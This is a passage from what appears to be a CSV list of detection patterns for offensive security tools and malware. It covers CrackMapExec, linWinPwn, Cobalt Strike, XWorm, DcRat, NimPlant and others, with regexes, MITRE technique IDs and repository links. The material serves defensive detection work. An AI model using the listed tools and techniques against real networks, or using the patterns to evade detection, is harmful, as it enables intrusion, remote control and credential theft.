C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*CmdLineSpoofer-master*",".{0,1000}CmdLineSpoofer\-master.{0,1000}","offensive_tool_keyword","CmdLineSpoofer","How to spoof the command line when spawning a new process from C#","T1055 - T1027 - T1036","TA0002 - TA0004 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/plackyhacker/CmdLineSpoofer","1","1","N/A","9","1","96","16","2021-12-28T18:56:25Z","2021-12-27T09:23:45Z" "*cmdshell *",".{0,1000}cmdshell\s.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*Cmd-Shinject.*",".{0,1000}Cmd\-Shinject\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*Cmd-Upload.*",".{0,1000}Cmd\-Upload\..{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*cme -d * -*",".{0,1000}cme\s\-d\s.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation 
tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme -d *localhost*",".{0,1000}cme\s\-d\s.{0,1000}localhost.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme*-macOS-latest-*",".{0,1000}cme.{0,1000}\-macOS\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","macOS default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme*-ubuntu-latest-*",".{0,1000}cme.{0,1000}\-ubuntu\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","ubuntu default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme*-windows-latest-*",".{0,1000}cme.{0,1000}\-windows\-latest\-.{0,1000}","offensive_tool_keyword","crackmapexec","windows default compiled executable name for crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral move","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme/cme.conf*",".{0,1000}cme\/cme\.conf.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme_bloodhound_output_*.txt*",".{0,1000}cme_bloodhound_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - 
T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_dfscoerce_output_*.txt*",".{0,1000}cme_dfscoerce_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_get-desc-users_pass_output_*",".{0,1000}cme_get\-desc\-users_pass_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_get-desc-users_pass_results*",".{0,1000}cme_get\-desc\-users_pass_results.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_gpp_output_*.txt*",".{0,1000}cme_gpp_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - 
T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_ldap-checker_output_*",".{0,1000}cme_ldap\-checker_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_MachineAccountQuota_output_*",".{0,1000}cme_MachineAccountQuota_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_ms17-010_output_*",".{0,1000}cme_ms17\-010_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_mssql_priv_output_*.txt*",".{0,1000}cme_mssql_priv_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 
- TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_ntlmv1_output_*",".{0,1000}cme_ntlmv1_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_passpol_output_*.txt*",".{0,1000}cme_passpol_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_petitpotam_output_*.txt*",".{0,1000}cme_petitpotam_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_printnightmare_output_*.txt*",".{0,1000}cme_printnightmare_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - 
TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_runasppl_output_*.txt*",".{0,1000}cme_runasppl_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_shadowcoerce_output_*.txt*",".{0,1000}cme_shadowcoerce_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_smb_enum*",".{0,1000}cme_smb_enum.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_smbsigning_output_*.txt*",".{0,1000}cme_smbsigning_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_subnets_output_*.txt*",".{0,1000}cme_subnets_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_trusted-for-delegation_output_*",".{0,1000}cme_trusted\-for\-delegation_output_.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_users_auth_ldap_*.txt*",".{0,1000}cme_users_auth_ldap_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_users_auth_smb_*.txt*",".{0,1000}cme_users_auth_smb_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network 
Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_users_nullsess_smb_*.txt*",".{0,1000}cme_users_nullsess_smb_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_webdav_output_*.txt*",".{0,1000}cme_webdav_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme_zerologon_output_*.txt*",".{0,1000}cme_zerologon_output_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*cme-macOS-latest-*.zip*",".{0,1000}cme\-macOS\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation 
tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme-ubuntu-latest-*.zip*",".{0,1000}cme\-ubuntu\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*cme-windows-latest-*.zip*",".{0,1000}cme\-windows\-latest\-.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*CMLoot.psm1*",".{0,1000}CMLoot\.psm1.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*CMLoot-main*",".{0,1000}CMLoot\-main.{0,1000}","offensive_tool_keyword","CMLoot","Find interesting files stored on (System Center) Configuration Manager (SCCM/CM) SMB shares","T1083 - T1039","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/1njected/CMLoot","1","1","N/A","8","2","140","20","2023-02-05T00:24:31Z","2022-06-02T10:59:21Z" "*cmpivot.py*",".{0,1000}cmpivot\.py.{0,1000}","offensive_tool_keyword","sccmhunter","SCCMHunter is a post-ex tool built to streamline identifying profiling and attacking SCCM related assets in an Active Directory domain","T1087 - T1046 - T1484","TA0003 - TA0006 - TA0011","N/A","N/A","Exploitation 
tools","https://github.com/garrettfoster13/sccmhunter","1","1","N/A","9","6","551","65","2024-04-10T20:49:24Z","2023-02-20T14:09:42Z" "*cms400net_default_userpass*",".{0,1000}cms400net_default_userpass.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Cmstp-Bypass.dll*",".{0,1000}Cmstp\-Bypass\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*Cmstp-Bypass.pdb*",".{0,1000}Cmstp\-Bypass\.pdb.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - 
T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","N/A","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*cmVmbGVjdGl2ZQ==*",".{0,1000}cmVmbGVjdGl2ZQ\=\=.{0,1000}","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","884","137","2023-10-20T14:34:33Z","2019-03-31T14:23:57Z" "*CN=DcRat Server*OU=qwqdanchun*O=DcRat By qwqdanchun*",".{0,1000}CN\=DcRat\sServer.{0,1000}OU\=qwqdanchun.{0,1000}O\=DcRat\sBy\sqwqdanchun.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - 
T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","0","N/A","10","10","890","331","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*CN=PortSwigger*",".{0,1000}CN\=PortSwigger.{0,1000}","offensive_tool_keyword","burpsuite","The class-leading vulnerability scanning. penetration testing. and web app security platform","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation Tools","https://portswigger.net/burp","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*CN=ShadowSpray*",".{0,1000}CN\=ShadowSpray.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*cnotin/SplunkWhisperer2*",".{0,1000}cnotin\/SplunkWhisperer2.{0,1000}","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","240","52","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" "*Coalfire-Research*",".{0,1000}Coalfire\-Research.{0,1000}","offensive_tool_keyword","Github Username","Red team exploitation tools ","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Coalfire-Research","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Coalfire-Research/Slackor*",".{0,1000}Coalfire\-Research\/Slackor.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - 
T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*Cobalt Strike external C2*",".{0,1000}Cobalt\sStrike\sexternal\sC2.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*Cobalt Strike*",".{0,1000}Cobalt\sStrike.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*cobaltclip.cna*",".{0,1000}cobaltclip\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike addons to interact with clipboard","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/DallasFR/Cobalt-Clip","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" 